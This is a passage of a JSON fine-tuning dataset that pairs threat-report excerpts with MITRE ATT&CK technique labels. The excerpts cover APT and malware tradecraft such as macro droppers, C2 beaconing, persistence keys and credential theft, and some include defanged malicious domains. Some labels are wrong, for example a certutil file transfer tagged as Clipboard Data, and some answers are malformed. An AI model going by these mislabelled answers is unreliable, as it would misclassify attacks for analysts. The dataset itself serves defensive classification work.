}, { "role": "assistant", "content": "T1134 - Access Token Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot has used an email with an Excel sheet containing a malicious macro to deploy the malware" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Our latest Transparent Tribe research confirms that the group continues to create malicious domains mimicking defense-related entities as a core component of their operations. The victim is encouraged to click on an embedded URL hosted on sharingmymedia[.]com, which then downloads ObliqueRAT, the trojan discovered by Talos in 2020 associated with threat activity targeting entities in South Asia. We cannot confirm how the maldocs were delivered to victims, but we suspect they were probably sent as attachments to phishing emails based on previous threat actor behavior and the targeted nature of this particular lure. Security researchers previously discovered Transparent Tribe using sharingmymedia[.]com to host Android malware targeting Indian military and defense personnel.Figure 1: Maldoc masquerading as a congratulatory notice from CLAWS. In such cases, adversaries would deliver phishing maldocs to targets containing a malicious VBA macro that extracted either the CrimsonRAT executable or a ZIP archive embedded in the maldoc. The macro dropped the implant to the disk, setting up persistence mechanisms and eventually executing the payload on the infected endpoint. For example, attackers leveraging ObliqueRAT started hosting their malicious payloads on compromised websites instead of embedding the malware in the maldoc. Figure 2 shows the attackers' use of HTTrack, a free website copier program, to duplicate a legitimate website to use for their own malicious purposes. These examples highlight Transparent Tribe's heavy reliance on social engineering as a core TTP and the group's efforts to make their operations appear as legitimate as possible.Figure 2: Fake website cloned using HTTrack on May 29, 2020. The malicious domain prompts the victim to enter their name and email address to sign up and download a seemingly important \"guide on pay and allowance" }, { "role": "assistant", "content": "T1608.004 - Drive-by Target" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can use SSL and TLS for communications." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kinsing has communicated with C2 over HTTP." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pupy can user PowerView to execute “net user” commands and create domain accounts." }, { "role": "assistant", "content": "T1136.002 - Create Account: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 19. Scrambling ‘Mac OSX 10.12’ Encryption The scrambled byte sequence is passed onto the constructor of the class Packet::Packet, which creates a random AES256 key and encrypts the buffer with this key" }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang is known to use 7Zip and RAR with passwords to encrypt data prior to exfiltration." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Netwalker can use Windows API functions to inject the ransomware DLL." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bumblebee can uninstall its loader through the use of a `Sdl` command." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gallmaker obfuscated shellcode used during execution." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "While the decoy in Figure 2 is displayed, the macro will search the document for the delimiter ###$$$ and write the base64 encoded text that follows this delimiter to the file %APPDATA%\\Base.txt. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http://<c2 domain>/chk. hex(Environment.UserName/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan’s request by echoing the value <hex(Environment.UserName/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http://<c2 domain>/what. hex(Environment.UserName/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit" }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gelsemium can use custom shellcode to map embedded DLLs into memory." }, { "role": "assistant", "content": "T1620 - Reflective Code Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A custom executable that only contains the Metasploit shellcode. It is saved to C:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\msupdateconf.exe, granting the executable persistence. Another custom executable used to execute PowerShell scripts. The Mosquito JScript backdoor that uses Google Apps Script as its C&C server. Privilege escalation using the Metasploit module ext_server_priv.x86.dll [8" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BLACKCOFFEE has the capability to create a reverse shell." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE BUTLER malware has used HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "adds a .plist file to the /Library/LaunchAgents folder to maintain persistence." }, { "role": "assistant", "content": "T1543.001 - Create or Modify System Process: Launch Agent" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Proton uses macOS' .command file type to script actions." }, { "role": "assistant", "content": "T1059.004 - Command and Scripting Interpreter: Bash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These keystrokes would run PowerShell commands that downloaded and installed various malware strains that acted as backdoors for the attackers into the victims’ networks" }, { "role": "assistant", "content": "T1091 - Replication Through Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Uses the chmod +x command to grant executable permissions to the ransomware." }, { "role": "assistant", "content": "T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HELLOKITTY can use WMI to delete volume shadow copies." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Volexity has worked with multiple victim organizations to assist with incident response efforts and to remedy their compromised systems. This process lead to the identification of different ways the OceanLotus group gains access to the compromised websites and how they maintain access" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Avenger has the ability to use Tasklist to identify running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The actors used certutil.exe, a known Living Off the Land\" technique, to transfer a file into a target environment.\"" }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The part of the malicious code that drops and executes a payload is nearly identical between the two samples. The legitimate Windows executable C:\\Windows\\System32\\colorcpl.exe is copied to the new directory C:\\ProgramData\\PackageColor and the embedded payload is written to C:\\ProgramData\\PackageColor\\colorui.dll." }, { "role": "assistant", "content": "T1218 - Signed Binary Proxy Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BoomBox can search for specific files and directories on a machine." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems. [1] For information on vulnerabilities known to be exploited by Chinese statesponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources. Chinese state-sponsored cyber actors have also been observed:  Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange® Outlook Web Access (OWA® ) and plant webshells.  Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources.  Deploying a public proof of concept (POC) exploit targeting a publicfacing appliance vulnerability." }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "steals credentials from compromised hosts. 's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by include ones associated with The Bat!, Yahoo!, Mail.ru, Passport.Net, Google Talk, Netscape Navigator, Mozilla Firefox, Mozilla Thunderbird, Internet Explorer, Microsoft Outlook, WinInet Credential Cache, and Lightweight Directory Access Protocol (LDAP)." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used custom DNS Tunneling protocols for C2." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BoxCaon established persistence by setting the \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\" registry key to point to its executable." }, { "role": "assistant", "content": "T1547 - Boot or Logon Autostart Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 (RDP), 139 (Netbios), and 445 (SMB) enabling full remote access from outside the network and has also used TOR." }, { "role": "assistant", "content": "T1090.003 - Proxy: Multi-hop Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has disguised malicious template files as JPEG files to avoid detection." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca has used PowerShell to execute commands." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The payload file also checks for the Logmein event log in an attempt to encrypt files in remote machines or servers connected to the victim’s machine. The path to the log file is hard-coded in the payload file, as shown here" }, { "role": "assistant", "content": "T1219 - Remote Access Software" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUPERNOVA is implemented as a modification to the existing ‘app_web_logoimagehandler.ashx.b6031896.dll’ module of the SolarWinds Orion application. The purpose of this module, in it’s legitimate form, is to return the logo image configured by the user to various web pages of the SolarWinds Orion web application. In legitimate operation, this class only contains the ProcessRequest() and LogoImageHandler() methods, a private static Log object, and public boolean parameter IsReusable" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT37 has used malware that will issue the command \"shutdown /r /t 1\" to reboot a system after wiping its MBR." }, { "role": "assistant", "content": "T1529 - System Shutdown/Reboot" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hardcore Nationalist group SideWinder is a threat group active since 2012 according to Kaspersky. This group mainly targets Pakistanis and Chinese military & government entities’ windows machines. They also target mobile phone devices. This is the second time this group is using COVID-19 theme to lure victims, thereby capitalizing on the fear of global pandemic. Sidewinder aka HN2 is believed to be an Indian state sponsored group. A detailed analysis of SideWinder attacks on Pakistani military officials was also published in April" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File', 'T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It uses two components to avoid detection by a single component. The dropper uses an old trick in a new way: It appends the RAT to a Word document. Upon opening the document, a macro is executed that will extract the malware and execute it" }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DEATHRANSOM can use public and private key pair encryption to encrypt files for ransom payment." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Appendix Malware Family Descriptions Malware Family Description Availability DROPSHOT Dropper that has been observed dropping and launching the TURNEDUP backdoor, as well as the SHAPESHIFT wiper malware Non-Public NANOCORE Publicly available remote access Trojan (RAT) available for purchase" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During C0015, the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript/VBScript code." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QUADAGENT was likely obfuscated using Invoke-Obfuscation." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used credential dumping tools." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleSeed has the ability to create the Registry key name \"EstsoftAutoUpdate\" at \"HKCU\\Software\\Microsoft/Windows\\CurrentVersion\\RunOnce\" to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Patchwork used Visual Basic Scripts (VBS) on victim machines." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The final payload created by the aforementioned process is a well known backdoor, also known as ROKRAT by Cisco Talos. One of its main functions is to steal information. Upon execution, this malware creates 10 random directory paths and uses them for a specially designated purpose" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LAPSUS$ has replayed stolen session token and passwords to trigger simple-approval MFA prompts in hope of the legitimate user will grant necessary approval." }, { "role": "assistant", "content": "T1111 - Multi-Factor Authentication Interception" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Seedworm group controls its Powermud backdoor from behind a proxy network to hide the ultimate command-and-control (C&C) location. The Seedworm group is the only group known to use the Powermud backdoor" }, { "role": "assistant", "content": "T1090.002 - External Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 11: PowerShell script is XOR encoded using a single byte key After deobfuscating the contents of the PowerShell Script, we can divide it into three sections" }, { "role": "assistant", "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The starred commands are undocumented commands" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CostaRicto employed nmap and pscan to scan target environments." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware attempts to connect to Windows shares for lateral movement by using a generated list of usernames, which center around permutations of the username Administrator, and weak passwords." }, { "role": "assistant", "content": "T1110 - Brute Force" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Avenger has the ability to use HTTP in communication with C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can be used to schedule a task on a system." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 used WMI to steal credentials and execute backdoors at a future time. They have also used WMI for the remote execution of files for lateral movement." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To start, the implant looks for the AHNLAB V3 Antivirus software's class name \"49B46336-BA4D-4905-9824-D282F05F6576\". If the software is found, the implant will hide the AV software window from the view of the infected user" }, { "role": "assistant", "content": "T1564.003 - Hide Artifacts: Hidden Window', 'T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SpicyOmelette has been signed with valid digital certificates." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HOPLIGHT has been observed loading several APIs associated with Pass the Hash." }, { "role": "assistant", "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWERSTATS has detected security tools." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices." }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "They renamed their files to make them look like legitimate files, for example, trilog.exe, named after a legitimate Schneider Electric application" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KOCTOPUS has used \"-WindowsStyle Hidden\" to hide the command window." }, { "role": "assistant", "content": "T1564.003 - Hide Artifacts: Hidden Window" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leafminer used several tools for retrieving login and password information, including LaZagne." }, { "role": "assistant", "content": "T1003.004 - OS Credential Dumping: LSA Secrets', 'T1003.005 - OS Credential Dumping: Cached Domain Credentials', 'T1552.001 - Unsecured Credentials: Credentials In Files', 'T1555 - Credentials from Password Stores', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Starting with a simple scan, the first information that the malware can collect is related to files with the following extensions: .docx, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .bmp, .tiff. For each file found on the disk, it retrieves the full path and the last modified date of the file. That information is encrypted using the AES key mentioned earlier and stored in the file 0.txt. Another scan targets the extensions .dat, .json, .db and like the previous scan it retrieves the full path and last modified date of the file. Then it encrypts them and it stores it under the file 57.txt" }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In its new attack, the actor initiated the infection chain sending a spear-phishing email containing a macro-embedded Word document." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SombRAT has encrypted its C2 communications with AES." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The two main changes are the obfuscation and the network protocol to communicate to the C2 server. The developers used two different obfuscation algorithms: one for the C2 encoding and one for the data. The C2 encoding is a simple XOR (as in 2012): The C2 encoding communication is also different. As the data are now sent with the GET method, the data must be in ASCII. That's they add base64 encoding in order to get supported characters in the HTTP query. For the first time, the developer switched from POST requests to GET requests: The exfiltrated data is appended to the URL. Here is the pattern: hxxp://C2_domain/MalwareIDVictimIPThirdIDExfiltratedDataBase64 SHA256:37d1bd82527d50df3246f12b931c69c2b9e978b593a64e89d16bfe0eb54645b0 C2 URL:hxxp://www[.]amanser951[.]otzo[.]com/uiho0.0.0.0edrftg.txt" }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys." }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ifconfig can be used to display adapter configuration on Unix systems, including information for TCP/IP, DNS, and DHCP." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot has collected usernames and passwords from Firefox and Chrome." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As we can see, the flow is obfuscated. But in Pony this technique is used in more sophisticated way because there are some junk instructions added between the PUSH and the RET in addition to a never executed bogus conditional jump" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RemoteCMD: This tool executes commands on remote computers, similar to the PsExec tool" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clop can encrypt files using AES, RSA, and RC4 and will add the \".clop\" extension to encrypted files." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bundlore uses the \"mktemp\" utility to make unique file and directory names for payloads, such as \"TMP_DIR=`mktemp -d -t x\"." }, { "role": "assistant", "content": "T1564 - Hide Artifacts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate 